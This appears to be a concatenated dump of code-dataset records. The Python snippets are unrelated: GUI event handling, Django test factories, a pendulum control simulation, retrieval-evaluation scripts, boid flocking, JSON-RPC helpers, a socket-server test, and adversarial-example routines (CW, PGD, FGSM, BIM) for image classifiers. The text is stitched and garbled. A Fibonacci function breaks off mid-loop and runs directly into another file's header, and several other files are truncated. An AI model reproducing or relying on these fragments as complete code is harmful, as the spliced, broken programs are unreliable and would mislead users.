9: \"FocusIn\",\n  10: \"FocusOut\",\n  12: \"Expose\",\n  15: \"Visibility\",\n  17: \"Destroy\",\n  18: \"Unmap\",\n  19: \"Map\",\n  21: \"Reparent\",\n  22: \"Configure\",\n  24: \"Gravity\",\n  26: \"Circulate\",\n  28: \"Property\",\n  32: \"Colormap\",\n  36: \"Activate\",\n  37: \"Deactivate\",\n  38: \"MouseWheel\"\n}\n'''\ncan.bind('<Enter>', enterB);\ncan.bind('<Leave>', leaveB);\ncan.bind('<Motion>', overB);\n\ntimer = simplegui.create_timer(500, 
timex);\ntimer.start();\n\n\nprint('\\033[1;37m');\n\nframe.start();\n","sub_path":"mouseEventExample.py","file_name":"mouseEventExample.py","file_ext":"py","file_size_in_byte":10639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"719701","text":"import factory\n\nfrom flicks.users.tests import UserFactory\nfrom flicks.videos import models\n\n\nclass Video2013Factory(factory.DjangoModelFactory):\n    FACTORY_FOR = models.Video\n\n    user = factory.SubFactory(UserFactory)\n    title = 'Test title'\n    description = 'Test desc'\n    vimeo_id = factory.Sequence(lambda n: int(n))\n    filename = factory.Sequence(lambda n: '{0}.mp4'.format(n))\n\n    @factory.post_generation\n    def vote_count(self, create, extracted, **kwargs):\n        if create and extracted:\n            for k in range(extracted):\n                models.Vote.objects.create(video=self,\n                                           user=UserFactory.create())\nVideoFactory = Video2013Factory\n\n\nclass Video2012Factory(factory.DjangoModelFactory):\n    FACTORY_FOR = models.Video2012\n\n    title = 'Test'\n    description = 'Test description'\n    category = 'test'\n    region = 'test'\n    upload_url = 'http://example.com'\n    shortlink = 'test_shortlink'\n    state = 'complete'\n    votes = 0\n","sub_path":"flicks/videos/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"79656424","text":"def fibonacci(n):\n    a=0\n    b=1\n    count=0\n    if n<0:\n        return 'not possible'\n    elif n==0:\n        return 0\n    elif n==1:\n        return 1\n    else:\n        while count\n# Current Version Modified by Kuroba for Robotics II HW \n\nfrom scipy.integrate import odeint\nimport numpy as np\nimport math\nimport sys\n\n# import original modules\nimport video_InvertedPendulum as vip\n\nm_th = 0.10#1.0 # mass theta [kg]\nm_x = 0.50#2.0 # mass x [kg]\nI = 0.01#0.00558389#1.0 # inertia 1 [kg m^2]\nl_g = 0.5 # length of pendulum [m]\ng = 9.80665 # gravitational acceleration[m/s^2]\n\n#K_p = float(sys.argv[1])#-100.0\n#K_v = float(sys.argv[2])#-89.6\n\ntheta_d = 0.0\ndtheta_d = 0.0\n\nparams = [m_th, m_x, I, l_g, g] # parameters\n\ntargets = [theta_d, dtheta_d] # targets\n\n# initial conditions(x0, dx0)\nmax_t = 5.0 # max_time [s]\ndt = 0.01 # dt [s]\n\nalpha = (I*(m_x+m_th))/(m_th*l_g) + m_x*l_g\nbeta = (m_x + m_th)*g\n\nK_p = 15\nK_v = 1\n\ngains = [K_p, K_v] # gains\n\nif K_v*K_v - 4*alpha*(K_p-beta) < 0:\n    s1_re = -K_v/(2*alpha)\n    s2_re = -K_v/(2*alpha)\n\n    s1_im = math.sqrt(-(K_v*K_v - 4*alpha*(K_p-beta)))/(2*alpha)\n    s2_im = -math.sqrt(-(K_v*K_v - 4*alpha*(K_p-beta)))/(2*alpha)\nelse:\n    s1_re = -K_v/(2*alpha) + math.sqrt(K_v*K_v - 4*alpha*(K_p-beta))/(2*alpha)\n    s2_re = -K_v/(2*alpha) - math.sqrt(K_v*K_v - 4*alpha*(K_p-beta))/(2*alpha)\n\n    s1_im = 0.0\n    s2_im = 0.0\n\n#S = [math.sqrt(beta/alpha), 0] # Poles of the system (no inputs)\nS = [s1_re, s1_im, s2_re, s2_im] # Poles of the system (no inputs)\n\nsqr = 4*alpha*(K_p-beta)\nif sqr < 0:\n    sqr = -sqr\n\nprint('alpha={},beta={}'.format(alpha, beta))\nprint('K_v^2={}, 4alpha(K_p-beta)={}, sqr={}'.format(K_v*K_v,4*alpha*(K_p-beta), math.sqrt(sqr)))\n\n\ndef Control(p):\n    x, dx, theta, dtheta = p\n\n    out = - K_p*(theta_d-theta) - K_v*(dtheta_d-dtheta)\n\n    return out\n\ndef InvertedPendulum(p, t):\n    x, dx, theta, dtheta = p\n\n    if theta > math.pi:\n        theta = theta - 2*math.pi\n    elif theta < -math.pi:\n        theta = theta + 2*math.pi\n\n    M_11 = m_x + m_th\n    M_12 = m_th*l_g*math.cos(theta)\n    M_21 = m_th*l_g*math.cos(theta)\n    M_22 = I + m_th*l_g*l_g\n\n    #define 
matrix\n    M = np.matrix([[M_11, M_12],[M_21, M_22]])\n    N = np.matrix([[-m_th*l_g*math.sin(theta)*dtheta*dtheta],[0]])\n    G = np.matrix([[0],[-m_th*g*l_g*math.sin(theta)]])\n    F = np.matrix([[Control(p)],[0]])\n\n    IM = np.linalg.inv(M) # calc Inverse matrix\n    A = (-1)*IM.dot(N+G-F) # F is right hand side of equations\n\n    ddx, ddtheta = A\n\n    return [dx, ddx, dtheta, ddtheta]\n\n\nt = np.arange(0.0, max_t, dt)\nx0 = [0.0, 0.0, 0.35*math.pi, 0.0]\np = odeint(InvertedPendulum, x0, t)\n\nvip.video(p, dt, max_t, params, gains, targets, S)\n","sub_path":"PythonRoboticsDay10_Control2/HW/Script/InvertedPendulum_odeint_Underdamped.py","file_name":"InvertedPendulum_odeint_Underdamped.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"101293817","text":"# minimum count to form 'b': 0\n# minimum count to form 'ba': b/a (no 'b' -> 0), ba -> 1\n# minimum count to form 'ban': b/a/n (no 'b' -> 0), ba/n -> 2, ban -> 0\n# minimum count to form 'bana': ba/na -> 2, ban(2)/a(1) -> 3\n# repeat\ndef solution(strs, t):\n    answer = 0\n    dp = [0] * (len(t)+1)\n    strs = set(strs)\n    \n    for i in range(1,len(t)+1):\n        dp[i] = float('inf')\n        for j in range(1,min(i+1,6)):\n            print(i-j,i,j,min(i+1,6))\n            print(t[i-j:i])\n            print(dp[i],dp[i-j])\n            if t[i-j:i] in strs:\n                print('--',min(dp[i],dp[i-j]+1))\n                dp[i] = min(dp[i],dp[i-j]+1)\n\n    return -1 if dp[-1] == float('inf') else dp[-1]\n","sub_path":"Algorithm/Programmers/level4_dp_단어퍼즐.py","file_name":"level4_dp_단어퍼즐.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"594989679","text":"import csv\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom config import Config\nfrom latentSemanticIndexingService import LSI_IRService\nfrom cosSimIRService import CosSim_IRService\nfrom doc2VecIRService import Doc2Vec_IRService\nfrom LdaIRService import LDA_IRService\nfrom Document import Document\nimport random\nfrom neuralEmbIRService import neuralEmb_IRService\nfrom pathlib import Path\nimport numpy as np\nimport os\n\n\n\nclass TestEvaluation:\n    def __init__(self, docCSV):\n        self.doc = Document()\n        self.allHeadlines = self.doc.allTopics\n        self.questions = []\n        self.expectedPages = []\n        self.expectedTopicHeadline = []\n        with open(docCSV) as f:\n            reader = csv.reader(f)\n            # Skip Header\n            next(reader)\n            questions = []\n            for row in reader:\n                self.expectedTopicHeadline.append(row[0])\n                self.expectedPages.append(list(map(int, row[1].split(\",\"))))\n                questions.append(list(map(str.strip, row[2:])))\n            self.questions = questions\n\n    def startTopNRandom(self, n):\n        total = 0\n        correct = 0\n        for i in range(len(self.expectedTopicHeadline)):\n            for question in self.questions[i]:\n                if question.strip():\n                    topNHeadlines = []\n                    answers = []\n                    for j in range(n):\n                        answers.append(random.choice(self.doc.allTopics))\n                    for answer in answers:\n                        topNHeadlines.append(answer)\n                    if self.expectedTopicHeadline[i].strip() in topNHeadlines:\n                        correct += 1\n                    total += 1\n        print(\"Top {} Evaluation finished! 
\".format(n) + str(correct) + \"/\" + str(total) + \"=\" + str(\n correct * 100 / total) + \"% correct.\")\n return correct * 100 / total\n\n def startTopNEvaluation(self, retrievalMethod, n):\n total = 0\n correct = 0\n correctAnsweredQuestions = []\n for i in range(len(self.expectedTopicHeadline)):\n for question in self.questions[i]:\n if question.strip():\n topNHeadlines = []\n answers = retrievalMethod.getTopNAnswers(question, n)\n for answer in answers:\n topNHeadlines.append(answer.topicHeadline.strip())\n # print(\"question:\", question)\n # print(\"expect:\", self.expectedTopicHeadline[i])\n # print(\"list:\", topNHeadlines)\n if self.expectedTopicHeadline[i].strip() in topNHeadlines:\n correct += 1\n correctAnsweredQuestions.append(1)\n else:\n correctAnsweredQuestions.append(0)\n total += 1\n print(\"Top {} Evaluation finished! \".format(n) + str(correct) + \"/\" + str(total) + \"=\" + str(\n correct * 100 / total) + \"% correct.\")\n plt.bar(range(0, len(correctAnsweredQuestions), 1), correctAnsweredQuestions)\n plt.xlabel('Question')\n plt.ylabel('Correctness')\n plt.title('Distribution of correct answers for mixed neuralEmb')\n plt.grid()\n plt.show()\n return correct * 100 / total\n\n\ndef plotLSI():\n config = Config()\n tester = TestEvaluation(\"../questionAnswerPairs.csv\")\n kList = []\n resTop1 = []\n resTop3 = []\n resTop10 = []\n\n for k in range(10, 220, 20):\n print(\"K:\", k)\n kList.append(k)\n service = LSI_IRService(config.manualPath, k)\n resTop1.append(tester.startTopNEvaluation(service, 1))\n resTop3.append(tester.startTopNEvaluation(service, 3))\n resTop10.append(tester.startTopNEvaluation(service, 10))\n fig, ax = plt.subplots()\n res1 = np.array(resTop1)\n res3 = np.array(resTop3)\n res10 = np.array(resTop10)\n print(\"max 1\", np.amax(res1))\n print(\"max 3\", np.amax(res3))\n print(\"max 10\",np.amax(res10))\n ax.plot(kList, resTop1, linestyle='--', marker=\"^\")\n ax.plot(kList, resTop3, linestyle='--', marker=\"+\")\n ax.plot(kList, resTop10, linestyle='--', marker=\"o\")\n\n ax.set(xlabel='k', ylabel='P@1[%] P@10[%]',\n title='Precision at 1, 3 and 10 for different k values')\n ax.grid()\n plt.xticks(range(0, 220, 20))\n fig.savefig(\"LSIrampe0-200.png\")\n plt.show()\n\n\ndef plotLDAKTopics():\n config = Config()\n tester = TestEvaluation(\"../questionAnswerPairs.csv\")\n kList = []\n resTop10 = []\n resTop3 = []\n resTop1 = []\n\n for k in range(5, 205, 5):\n if Path(config.ldaModelFile).exists():\n os.remove(config.ldaModelFile)\n print(\"K:\", k)\n kList.append(k)\n service = LDA_IRService(k)\n resTop1.append(tester.startTopNEvaluation(service, 1))\n resTop3.append(tester.startTopNEvaluation(service, 3))\n resTop10.append(tester.startTopNEvaluation(service, 10))\n fig, ax = plt.subplots()\n ax.plot(kList, resTop1, linestyle='--', marker=\"^\")\n ax.plot(kList, resTop3, linestyle='-.', marker=\"+\")\n ax.plot(kList, resTop10, linestyle='--', marker=\"o\")\n ax.set(xlabel='k number of topics', ylabel='P@1[%] P@3[%] P@10[%]',\n title='Precision at 1, 3 and 10 for k topics')\n ax.grid()\n plt.xticks(range(0, 220, 20))\n\n fig.savefig(\"LDA5-200Ktopics.png\")\n plt.show()\n\ndef plotLDA():\n config = Config()\n tester = TestEvaluation(\"../questionAnswerPairs.csv\")\n kList = []\n resTop10 = []\n resTop3 = []\n resTop1 = []\n\n for k in range(1, 21, 1):\n if Path(config.ldaModelFile).exists():\n os.remove(config.ldaModelFile)\n print(\"K:\", k)\n kList.append(k)\n service = LDA_IRService()\n resTop1.append(tester.startTopNEvaluation(service, 1))\n 
resTop3.append(tester.startTopNEvaluation(service, 3))\n        resTop10.append(tester.startTopNEvaluation(service, 10))\n    fig, ax = plt.subplots()\n    ax.plot(kList, resTop1, linestyle='--', marker=\"^\")\n    ax.plot(kList, resTop3, linestyle='-.', marker=\"+\")\n    ax.plot(kList, resTop10, linestyle='--', marker=\"o\")\n    ax.set(xlabel='Iteration', ylabel='P@1[%] P@3[%] P@10[%]',\n           title='Precision at 1, 3 and 10 for 32 topics')\n    ax.grid()\n    plt.xticks(range(1, 22, 2))\n\n    fig.savefig(\"LDA20mal-32topics-justHeadline.png\")\n    plt.show()\n\nif __name__ == \"__main__\":\n    config = Config()\n    tester = TestEvaluation(\"../questionAnswerPairs.csv\")\n    print(\"LDA Results:\")\n    ldaService = LDA_IRService()\n    ldaTop1 = tester.startTopNEvaluation(ldaService, 1)\n    ldaTop3 = tester.startTopNEvaluation(ldaService, 3)\n    ldaTop10 = tester.startTopNEvaluation(ldaService, 10)\n    # print(\"CosSim Results:\")\n    # cosSimService = CosSim_IRService(config.manualPath)\n    # cossimTop1 = tester.startTopNEvaluation(cosSimService, 1)\n    # cossimTop3 = tester.startTopNEvaluation(cosSimService, 3)\n    # cossimTop10 = tester.startTopNEvaluation(cosSimService, 10)\n    # lsiService = LSI_IRService(config.manualPath, 60)\n    # print(\"LSI Results:\")\n    # lsitop1 = tester.startTopNEvaluation(lsiService, 1)\n    # lsitop3 = tester.startTopNEvaluation(lsiService, 3)\n    # lsitop10 = tester.startTopNEvaluation(lsiService, 10)\n    # print(\"Neural Embedding Results:\")\n    # nEmbService = neuralEmb_IRService()\n    # tester.startTopNEvaluation(nEmbService, 1)\n    # tester.startTopNEvaluation(nEmbService, 3)\n    # tester.startTopNEvaluation(nEmbService, 10)\n    # print(\"Random Results:\")\n    # tester.startTopNRandom(1)\n    # tester.startTopNRandom(3)\n    # tester.startTopNRandom(10)\n    # plotLDAKTopics()\n    # plotLDA()\n    # plotLSI()\n","sub_path":"thesis/src/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":7703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"457157606","text":"import numpy as np\n\nCANVAS_RES = (800, 600)\nPERCEPTION_RADIUS = 100\nMAX_SPEED = 4\nMAX_FORCE = 0.1\n\n\ndef edge(current):\n    current.pos[0] %= CANVAS_RES[0]\n    current.pos[1] %= CANVAS_RES[1]\n\n\ndef native_array(array):\n    np_array = np.array(array)\n    return [np_array[0].item(), np_array[1].item()]\n\n\ndef max_force(vec):\n    if np.linalg.norm(vec) > MAX_FORCE:\n        return (vec / np.linalg.norm(vec)) * MAX_FORCE\n    return vec\n\n\ndef max_speed(vec):\n    if np.linalg.norm(vec) > 0:\n        return (vec / np.linalg.norm(vec)) * MAX_SPEED\n    return vec\n\n\ndef flock_vectors(current, boids):\n    alignment = np.array([0, 0])\n    cohesion = np.array([0, 0])\n    separation = np.array([0, 0])\n    total = 0\n    for other in boids:\n        diff = np.array(other.pos) - np.array(current.pos)\n        dist = np.linalg.norm(diff)\n        if other is not current and dist < PERCEPTION_RADIUS:\n            alignment = np.add(alignment, np.array(other.vel))\n\n            cohesion = np.add(cohesion, np.array(other.pos))\n\n            diff_vec = np.subtract(np.array(current.pos), np.array(other.pos))\n            diff_vec = np.divide(diff_vec, dist) if dist != 0 else diff_vec\n            separation = np.add(separation, np.array(diff_vec))\n\n            total += 1\n    if total > 0:\n        alignment = np.divide(alignment, total)\n        alignment = (alignment / np.linalg.norm(alignment)) * MAX_SPEED\n        alignment = np.subtract(alignment, np.array(current.vel))\n\n        cohesion = np.divide(cohesion, total)\n        cohesion = np.subtract(cohesion, np.array(current.pos))\n        cohesion = max_speed(cohesion)\n        cohesion = np.subtract(cohesion, np.array(current.vel))\n        cohesion 
= max_force(cohesion)\n\n        separation = np.divide(separation, total)\n        separation = max_speed(separation)\n        separation = np.subtract(separation, np.array(current.vel))\n        separation = max_force(separation)\n\n    return alignment, cohesion, separation\n\n\ndef attack(rock_position, rock_velocity, rock_acceleration, current, ship, missiles):\n    missiles_list = list(missiles)\n    attack_direction = np.subtract(ship.pos, current.pos)\n    if len(missiles_list) > 0:\n        attack_direction = np.subtract(missiles_list[0].pos, current.pos)\n\n    attack_direction = max_speed(attack_direction)\n    attack_direction = np.subtract(attack_direction, np.array(current.vel))\n    attack_direction = max_force(attack_direction)\n\n    attack_direction = native_array(attack_direction)\n    if attack_direction != [0, 0]:\n        rock_acceleration = native_array(attack_direction)\n\n    rock_position = np.add(rock_position, rock_velocity)\n    rock_velocity = np.add(rock_velocity, rock_acceleration)\n\n    return rock_position, rock_velocity\n\n\ndef defense(rock_position, rock_velocity, rock_acceleration, current, ship, missiles):\n    missiles_list = list(missiles)\n    defense_direction = np.subtract(current.pos, ship.pos)\n    if len(missiles_list) > 0:\n        defense_direction = np.subtract(current.pos, missiles_list[0].pos)\n\n    defense_direction = max_speed(defense_direction)\n    defense_direction = np.subtract(defense_direction, np.array(current.vel))\n    defense_direction = max_force(defense_direction)\n\n    defense_direction = native_array(defense_direction)\n    if defense_direction != [0, 0]:\n        rock_acceleration = native_array(defense_direction)\n\n    rock_position = np.add(rock_position, rock_velocity)\n    rock_velocity = np.add(rock_velocity, rock_acceleration)\n\n    return rock_position, rock_velocity\n\n\ndef update_rock_position(current, boids, ship, missiles):\n    acceleration = [0, 0]\n    alignment, cohesion, separation = flock_vectors(current, boids)\n\n    total = np.add(acceleration, alignment)\n    total = np.add(total, cohesion)\n    total = np.add(total, separation)\n    total = native_array(total)\n    if total != [0, 0]:\n        acceleration = native_array(total)\n\n    position = np.array(current.pos)\n    velocity = np.array(current.vel)\n    acceleration = np.array(acceleration)\n\n    position = np.add(position, velocity)\n    velocity = np.add(velocity, acceleration)\n\n    # by default CALM behaviour is used\n    no_missiles = len(missiles)\n    # if there are fewer than 3 missiles, the attack behaviour is used\n    if 0 < no_missiles <= 3:\n        position, velocity = attack(position, velocity, acceleration, current, ship, missiles)\n    # if there are more than 3 missiles, the defense behaviour is used\n    elif no_missiles > 3:\n        position, velocity = defense(position, velocity, acceleration, current, ship, missiles)\n\n    current.pos = native_array(position)\n    current.vel = native_array(velocity)\n\n    edge(current)\n","sub_path":"Lab2/FlockingAsteroids/rock_behaviour.py","file_name":"rock_behaviour.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"490408753","text":"# -*- coding: utf-8 -*-\nimport asyncio\nimport functools\nimport logging\nfrom collections import OrderedDict\nfrom concurrent.futures import ThreadPoolExecutor\nfrom copy import deepcopy\nfrom typing import Callable\nfrom typing import Optional\nfrom typing import Tuple\n\nfrom funcy.decorators import Call\nfrom funcy.decorators import decorator\n\nfrom jussi.typedefs import HTTPRequest\nfrom jussi.typedefs import HTTPResponse\nfrom jussi.typedefs 
import JsonRpcRequest\nfrom jussi.typedefs import SingleJsonRpcRequest\nfrom jussi.typedefs import SingleJsonRpcResponse\nfrom jussi.typedefs import StringTrie\nfrom jussi.typedefs import WebApp\n\nlogger = logging.getLogger('sanic')\n\nJSONRPC_REQUEST_KEYS = set(['id','jsonrpc','method','params'])\n\n# decorators\n@decorator\ndef apply_single_or_batch(call: Call) -> JsonRpcRequest:\n \"\"\"Decorate func to apply func to single or batch jsonrpc_requests\n \"\"\"\n if isinstance(call.single_jsonrpc_request, list):\n original = deepcopy(call.single_jsonrpc_request)\n results = []\n for request in original:\n # pylint: disable=protected-access\n call._kwargs['single_jsonrpc_request'] = request\n results.append(call())\n return results\n return call()\n\n\n@decorator\nasync def ignore_errors_async(call: Call) -> Optional[dict]:\n try:\n # pylint: disable=protected-access\n if not asyncio.iscoroutinefunction(call._func):\n loop = asyncio.get_event_loop()\n executor = ThreadPoolExecutor(max_workers=1)\n return await loop.run_in_executor(executor, call)\n return await call()\n except Exception as e:\n logger.exception('Error ignored %s', e)\n\n\ndef async_exclude_methods(middleware_func: Optional[Callable]=None,\n exclude_http_methods: Tuple[str]=None) -> Optional[Callable]:\n \"\"\"Exclude specified HTTP methods from middleware\n\n Args:\n middleware_func:\n exclude_http_methods:\n\n Returns:\n\n \"\"\"\n if middleware_func is None:\n return functools.partial(\n async_exclude_methods, exclude_http_methods=exclude_http_methods)\n\n @functools.wraps(middleware_func)\n async def f(request: HTTPRequest) -> Optional[HTTPResponse]:\n if request.method in exclude_http_methods:\n return\n return await middleware_func(request)\n return f\n\n\n@apply_single_or_batch\ndef sort_request(\n single_jsonrpc_request: SingleJsonRpcRequest=None) -> OrderedDict:\n params = single_jsonrpc_request.get('params')\n if isinstance(params, dict):\n single_jsonrpc_request['params'] = dict(\n sorted(single_jsonrpc_request['params'].items()))\n return OrderedDict(sorted(single_jsonrpc_request.items()))\n\n\n@apply_single_or_batch\ndef is_valid_jsonrpc_request(\n single_jsonrpc_request: SingleJsonRpcRequest=None) -> None:\n if not isinstance(single_jsonrpc_request, dict):\n raise ValueError('Not JSONRPC Request')\n assert JSONRPC_REQUEST_KEYS.issuperset(single_jsonrpc_request.keys())\n assert single_jsonrpc_request.get('jsonrpc') == '2.0'\n assert isinstance(single_jsonrpc_request.get('method'), str)\n if 'id' in single_jsonrpc_request:\n assert isinstance(single_jsonrpc_request['id'], (int, str, type(None)))\n\n\n\ndef parse_namespaced_method(namespaced_method: str,\n default_namespace: str='steemd'\n ) -> Tuple[str, str]:\n parts = namespaced_method.split('.')\n if len(parts) == 1:\n return default_namespace, namespaced_method\n return parts[0], '.'.join(parts[1:])\n\n\ndef method_urn(single_jsonrpc_request: SingleJsonRpcRequest) -> str:\n api = None\n query = ''\n namespace, method = parse_namespaced_method(\n single_jsonrpc_request['method'])\n params = single_jsonrpc_request.get('params', None)\n if isinstance(params, dict):\n params = dict(sorted(params.items()))\n if namespace == 'steemd':\n if method == 'call':\n assert isinstance(params, list)\n api = params[0]\n method = params[1]\n params = params[2]\n else:\n api = 'database_api'\n if params and params != []:\n query = ('.params=%s' % params).replace(' ', '')\n return '.'.join([p for p in (namespace, api, method, ) if p]) + query\n\n\ndef get_upstream(upstreams, 
single_jsonrpc_request: SingleJsonRpcRequest\n ) -> Tuple[str, int]:\n urn = method_urn(single_jsonrpc_request)\n _, ttl = upstreams.longest_prefix(urn)\n return 'error', ttl\n\n\ndef is_batch_jsonrpc(\n jsonrpc_request: JsonRpcRequest=None,\n sanic_http_request: HTTPRequest=None, ) -> bool:\n return isinstance(jsonrpc_request, list) or isinstance(\n sanic_http_request.json, list)\n\ndef is_jsonrpc_error_response(jsonrpc_response: SingleJsonRpcResponse) -> bool:\n if not jsonrpc_response:\n return True\n if not isinstance(jsonrpc_response, dict):\n return True\n if 'error' in jsonrpc_response:\n return True\n return False\n\n\ndef upstream_url_from_jsonrpc_request(\n upstream_urls: StringTrie=None,\n single_jsonrpc_request: SingleJsonRpcRequest=None) -> str:\n urn = method_urn(single_jsonrpc_request=single_jsonrpc_request)\n return upstream_url_from_urn(upstream_urls, urn=urn)\n\n\ndef upstream_url_from_urn(upstream_urls: StringTrie=None,\n urn: str=None) -> str:\n _, url = upstream_urls.longest_prefix(urn)\n return url\n\n\n# pylint: disable=super-init-not-called\nclass AttrDict(dict):\n def __init__(self, *args, **kwargs) -> None:\n super(AttrDict, self).__init__(*args, **kwargs)\n self.__dict__ = self\n\n\nclass DummyRequest(AttrDict):\n def __init__(self, app: WebApp=None, json: dict=None) -> None:\n self.app = app\n self.json = json\n","sub_path":"jussi/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"273557832","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport unittest\nimport os\nimport sys\nimport inspect\nimport threading\nimport socket\nimport json\n\nfrom basetest import BaseTest, FILEZONE, DOMAIN\n\nfrom libs.utils import get_logger, ip_generator, id_generator, \\\n silentremove\nfrom libs.ipanel_socket_server import IpanelTCPServer, \\\n IpanelTCPServerHandler\n\nHOST = '127.0.0.1'\nPORT = 13373\nDOMAIN = 'example.com'\nFILEZONE = '/tmp/' + DOMAIN + '.zone'\nHOST1 = '.'.join([id_generator(), DOMAIN, ''])\nHOST2 = '.'.join([id_generator(), DOMAIN, ''])\nIP1 = ip_generator()\nIP2 = ip_generator()\n\n\nclass MyRequestHandlerTest(unittest.TestCase):\n\n def setUp(self):\n self.server = IpanelTCPServer((HOST, PORT),\n IpanelTCPServerHandler)\n self.server_thread = \\\n threading.Thread(target=self.server.serve_forever)\n self.client = socket.create_connection((HOST, PORT))\n\n # self.server_thread.setDaemon(True)\n\n self.server_thread.start()\n\n def tearDown(self):\n self.client.close()\n self.server.shutdown()\n self.server.server_close()\n silentremove(FILEZONE)\n\n def send_data(self, data):\n self.client.send(json.dumps(data))\n\n def recv_data(self):\n return json.loads(self.client.recv(10240))\n\n def test_create_rr_a(self):\n data = {\n 'command': 'manage_dns',\n 'action': 'add',\n 'domain': DOMAIN,\n 'type': 'a',\n 'host': HOST1,\n 'dest': IP1,\n 'filename': FILEZONE,\n }\n self.send_data(data)\n result = self.recv_data()\n self.assertEqual(result['success'], True)\n\n\ndef main():\n unittest.main()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tests/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"537853809","text":"from __future__ import print_function\nimport torch\nimport sys\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision 
import datasets, transforms\nimport numpy as np\nimport matplotlib.pyplot as plt\nsys.path.append('..')\nfrom utils import *\n\n# epsilons = [0, .05, .1, .15, .2, .25, .3]\n# use_cuda=True\n\n# you need to set requires_grad attribute of tensor before calling this function.\n# data.requires_grad = True\n# you can call this function as #perturbed_data = fgsm_attack(data, epsilon, data_grad)\n# FGSM attack code\ndef cw_l2_defense(model, model_low, model_high, images, labels, targeted=False, c=1e-4, kappa=50, max_iter=40, learning_rate=0.01, device='cuda'):\n\n # Define f-function\n def f(x):\n # outputs = model(x)\n low_layer = model_low(images)\n high_layer = model_high(images)\n\n # low_layer = torch.cat((low_layer, low_layer), 1)\n # low_layer = torch.cat((low_layer, low_layer), 1)\n # low_layer = torch.cat((low_layer, low_layer), 1)\n\n inputs_joint = concat_tensor_and_vector(low_layer, high_layer, device)\n outputs = model(inputs_joint)\n\n return outputs\n\n # one_hot_labels = torch.eye(len(outputs[0]))[labels].to(device)\n #\n # i, _ = torch.max((1-one_hot_labels)*outputs, dim=1)\n # j = torch.masked_select(outputs, one_hot_labels.bool())\n #\n # # If targeted, optimize for making the other class most likely\n # if targeted:\n # return torch.clamp(i-j, min=-kappa)\n #\n # # If untargeted, optimize for making the other class most likely\n # else:\n # return torch.clamp(j-i, min=-kappa)\n\n w = torch.zeros_like(images, requires_grad=True).to(device)\n w.detach_()\n w.requires_grad = True\n\n optimizer = optim.Adam([w], lr=learning_rate)\n prev = 1e10\n\n for step in range(max_iter):\n\n a = 1/2*(nn.Tanh()(w) + 1)\n\n loss1 = nn.MSELoss(reduction='sum')(a, images)\n loss2 = torch.sum(c*f(a))\n\n cost = loss1 + loss2\n\n optimizer.zero_grad()\n cost.backward()\n optimizer.step()\n\n # Early Stop when loss does not converge.\n if step % (max_iter//10) == 0:\n if cost > prev:\n print('Attack Stopped due to CONVERGENCE....')\n return (1/2*(nn.Tanh()(w) + 1)).detach()\n prev = cost\n\n # print('- Learning Progress : %2.2f %% ' %((step+1)/max_iter*100), end='\\r')\n\n attack_images = 1/2*(nn.Tanh()(w) + 1).detach()\n\n return attack_images\n\ndef pgd_defense(model, model_low, model_high, images, labels, targeted=False, eps=8/255, alpha=2/255, iters=20, random_start=True, device='cuda', detector_on=True):\n\n loss = nn.BCELoss()\n if targeted:\n loss = lambda x, y: -nn.BCELoss()(x, y)\n\n ori_images = images.clone().detach()\n\n if random_start:\n # Starting at a uniformly random point\n images = images + torch.empty_like(images).uniform_(-eps, eps)\n images = torch.clamp(images, min=0, max=1)\n\n for i in range(iters):\n images.requires_grad = True\n\n low_layer = model_low(images)\n high_layer = model_high(images)\n\n # low_layer = torch.cat((low_layer, low_layer), 1)\n # low_layer = torch.cat((low_layer, low_layer), 1)\n # low_layer = torch.cat((low_layer, low_layer), 1)\n\n inputs_joint = concat_tensor_and_vector(low_layer, high_layer, device)\n outputs = model(inputs_joint)\n\n cost = loss(outputs, labels)\n\n grad = torch.autograd.grad(cost, images,\n retain_graph=False, create_graph=False)[0]\n if detector_on: # and (i == 0):\n grad = grad * torch.where(outputs > 0.5, torch.tensor([1.]).to(device), torch.tensor([0.]).to(device)).reshape((-1, 1, 1, 1))\n\n adv_images = images - alpha * grad.sign()\n eta = torch.clamp(adv_images - ori_images, min=-eps, max=eps)\n images = torch.clamp(ori_images + eta, min=0, max=1).detach()\n\n adv_images = images\n\n return adv_images\n\ndef 
fgsm_attack_rev(model, images, labels, eps=8/255):\n loss = nn.CrossEntropyLoss()\n\n images.requires_grad = True\n\n outputs = model(images)\n\n cost = loss(outputs, labels)\n\n grad = torch.autograd.grad(cost, images, retain_graph=False, create_graph=False)[0]\n\n adv_images = images + eps * grad.sign()\n adv_images = torch.clamp(adv_images, min=0, max=1).detach()\n\n return adv_images\n\n\n\n# you can call this function as\n# perturbed_data = basic_iterative_attack(model, loss, data, target, scale=1, eps=4, alpha=epsilon)\n#BIM attack code\ndef basic_iterative_attack(model, images, labels, eps=8/255, alpha=2/255, iters=0):\n\n if iters == 0 :\n # The paper said min(eps + 4, 1.25*eps) is used as iterations\n iters = int(min(eps * 255 + 4, 1.25 * eps * 255))\n\n loss = nn.CrossEntropyLoss()\n\n for i in range(iters):\n images.requires_grad = True\n outputs = model(images)\n\n # model.zero_grad()\n cost = loss(outputs, labels)\n\n grad = torch.autograd.grad(cost, images,\n retain_graph=False, create_graph=False)[0]\n # cost.backward()\n\n adv_images = images + alpha * grad.sign()\n\n # 